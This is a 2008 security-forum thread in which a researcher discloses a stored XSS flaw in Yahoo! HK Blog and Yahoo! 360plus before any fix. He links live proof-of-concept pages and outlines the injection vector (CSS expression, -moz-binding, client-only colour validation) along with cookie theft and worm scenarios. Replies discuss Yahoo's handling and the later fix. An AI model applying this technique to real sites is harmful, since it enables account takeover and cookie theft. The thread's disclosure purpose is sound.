Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 26, 2008 08:07AM

Hi everyone,

Finally, here I am, going to disclose a critical XSS Vulnerability from two of Yahoo! blogging products: Yahoo! Hong Kong Blog (with around half a million users) and the buggy cloned version: Yahoo! 360plus typically for Vietnamese users.

Let me explain why I decided to disclose everything this time even when nothing was fixed from Yahoo! yet. For those don't have time to read my story, you can skip to the bottom to see the live PoCs.

You may remember last time I discovered a XSS hole in Yahoo! Mail Classic via file attachments and helped them to fix it silently without any full disclosure. Once it was fixed, as always they forget it, forget you, not even a single thank or credit word anywhere.

A few weeks ago I discover another serious flaw in their blogging products and immediately sent them an email:

Quote

I've just discovered a highly critical security vulnerability of Yahoo! HK BLOG and Yahoo! 360plus (for Vietnam), which allows any user to inject external javascript file to be executed on his own blog page. Whenever a Yahoo! user visits the blog, his cookie information can be immediately stolen using Cross Site Scripting technique, then used for different purposes depending on the hacker's own target, some of which can be:

- Injecting the same exploiting script on the victim's blog page to compromise other Yahoo! user accounts when they visit his blog. This can automatically generate an extremely powerful botnet throughout the whole blog community.
- Deface the victim's blog page.
- Use phishing technique to get Yahoo! users type in their password.
- Steal the victim's personal information from other Yahoo! services like Yahoo! Mail.
- Target popular blogs with high traffic and create massive DDoS attacks towards other systems.

The hacking process can be absolutely transparent and requires no further interaction from visitors. I've successfully created the PoC (Proof of Concept) which works perfectly with the most popular browsers including Firefox 2, Internet Explorer 6 and 7 fully patched. Since Yahoo! 360plus has the same source code base with Yahoo! HK Blog, the same issue exists on both of the products. Personal information and private documents of every Yahoo! user are put at high risk.

Until this moment, details of the vulnerability are kept privately by myself. Once again, I'm more than willing to help Yahoo! Security Team with all required information in order to fix the issue as soon as possible. I suggest both parties go for the RFPolicy v2.0 (http://www.wiretrip.net/rfp/policy.html), which have some important points I want to emphasize on:

1. Yahoo! Security continuously update me about the fixing progress until the issue is fully resolved.
2. Upon completion of the fix, a news article or an official blog entry from Yahoo! is posted:
- Notify Yahoo! users about the vulnerability and the fix.
- Include the credit for discovery of the issue
3. I reserve the rights to disclose this vulnerability to the public should Yahoo! fails to contact me after 5 days from now.

Clearly you can see my points. All I need is once they fix it, they let their users know about it in their blog, and put one line of credit for discovery of the issue. That's what a web service company supposed to do, and that's how the RFPolicy v2.0 trying to solve the vendor's flaws - researcher's credit problem.

And here is exactly what they replied, no better than a lousy, low-class auto response:

Quote

Thank you for sending this to Yahoo!. It will be sent to the correct teams to investigate and if a fix is required, we will contact you and ask you see the issue as resolved as well.

We ask that you send over steps to reproduce the issues you are seeing as well as the URLs of the pages you see it on.

Yahoo! Security Contact

Everyone knows Google has a dedicated page with all the names of the security researchers who helped to report critical security issues. That's all a true security researcher may need when they decided to help, not to destroy. It's just a thank, no more than that, no money, nothing. For years Yahoo! took advantages of security researchers who are kind enough to help them fixing tons of their stupid security holes "for free" without having even a single credit line in return anywhere. Things were drown silently and the helpers are forgotten forever. I helped them once for nothing, not a second time:

Quote

Thanks for the reply. However, please focus on the points I've clearly stated. If once again (this should be the second time to me, and probably hundredth to other security community members), Yahoo! ignores giving credit information for discovery of the issues to the researchers in return for the help of reporting critical security vulnerabilities, I will not give any further details. In such case, I prefer to disclose the information to the public instead. Please give me the final answer on that by May 25.

As expected, no more answer from them until now. Again, irresponsibility is what Yahoo! Security made of.

That explains why I will never report any security issue to them again. Instead, I'll disclose to make a buzz for Yahoo! users that they are (always) at risk.

Well, enough story, here are the PoCs. Please be reminded this is only for reference purpose and I'm definitely not encouraging any actual exploit whatsoever. I am NOT responsible for any damage caused.

Yahoo! Hong Kong Blog:
http://hk.myblog.yahoo.com/hkblog-hacked

Yahoo! 360plus:
http://vn.myblog.yahoo.com/360plus-hacked

They are two blog pages that have been injected with my PoC javascript file. Those PoCs works perfectly with IE 6, IE 7 and Firefox 2.x.

The vector is quite simple indeed. You're allowed to pick custom colors to change the look of your own blogs. Surprisingly they only check the validity of the HEX color code using javascript on the client-side. There's no filtering on the server-side, which allow you to make a simple HTTP request to put whatever you want to be loaded inside the custom CSS file later on. CSS expression for IE, -moz-binding for Firefox 2.x with a bit of String.fromCharCode technique, and that's it. Please refer to the great RSnake Cheat Sheet for details.

This vulnerability can be extremely dangerous if A creates a XSS Worm, inject into his own blog. When B visits A's blog, his own blog is infected and unintentionally pass the worm to all his friends who visit his blog page later on. In just a day, it's hard to imagine how many Yahoo! accounts' cookie are stolen. Famous stars' blogs are most likely the 1st targeted batch of victims.



Edited 2 time(s). Last edit at 06/26/2008 08:12AM by nktpro.

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: thrill
Date: June 26, 2008 12:53PM

Nice find, good job trying to work with these jerks. You're doing the right thing for their users!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: hometown
Date: June 27, 2008 09:38PM

This is really a serious falw.Yahoo made a big mistake! Hope it can be fixed ASAP.

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 29, 2008 08:05AM

Update: Yahoo! seems to have fixed this flaw, just a few days after my disclosure :). Haha I didn't think their staff visit this forums so often.

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: asilvermtzion
Date: June 29, 2008 04:39PM

Haha, nice. Did you get any credit?

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: nktpro
Date: June 30, 2008 08:07AM

@asilvermtzion: Well obviously not. If I did get a thank from them, they would not be Yahoo! :))

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Date: June 30, 2008 12:35PM

Well I for one will give you a thanks and a job well done!

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: trev
Date: July 03, 2008 04:51AM

@nktpro: I feel your pain. I stopped trying to do responsible disclosure with Yahoo long ago - any reports to them go down a black hole, and there are really lots and lots of issues to report. Even Microsoft is trying to keep security researchers in the loop, but Yahoo is really hopeless.

Options: ReplyQuote
Re: Yahoo! HK Blog & Yahoo! 360plus XSS Disclosure
Posted by: Malkav
Date: July 03, 2008 06:22AM

all will be solved when turned into MicroHoo! (or Yasoft! or whatever)

you will get neither the patch, nor the security reports. all is well in corpo paradise :) (and yahoo will only be IE7 compatible.)

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Options: ReplyQuote


Sorry, only registered users may post in this forum.